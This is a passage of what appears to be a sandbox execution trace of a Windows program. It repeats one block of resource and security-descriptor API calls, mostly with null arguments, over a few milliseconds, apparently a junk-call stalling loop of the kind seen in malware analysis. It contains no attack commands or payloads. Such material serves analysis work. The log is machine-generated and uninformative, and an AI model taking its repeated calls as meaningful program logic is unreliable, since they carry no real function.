pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.866] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.866] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.866] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.866] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.866] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.866] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.866] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.866] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.866] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.866] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.866] LockResource (hResData=0x0) returned 0x0 [0219.866] FreeResource (hResData=0x0) returned 0 [0219.866] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.867] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.867] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.867] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.867] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.867] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.867] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.867] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.867] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.867] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.867] LockResource (hResData=0x0) returned 0x0 [0219.867] FreeResource (hResData=0x0) returned 0 [0219.867] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.868] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.868] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.868] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.868] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.868] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.868] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.868] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.868] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.868] LockResource (hResData=0x0) returned 0x0 [0219.868] FreeResource (hResData=0x0) returned 0 [0219.868] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.868] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.868] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.868] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.868] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.869] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.869] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.869] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.869] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.869] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.869] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.869] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.869] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.869] FreeResource (hResData=0x0) returned 0 [0219.869] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.869] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.869] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.870] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.870] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.870] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.870] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.870] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.870] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.870] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.870] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.870] LockResource (hResData=0x0) returned 0x0 [0219.870] FreeResource (hResData=0x0) returned 0 [0219.870] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.870] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.870] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.870] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.870] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.871] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.871] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.871] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.871] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.871] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.871] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.871] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.871] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 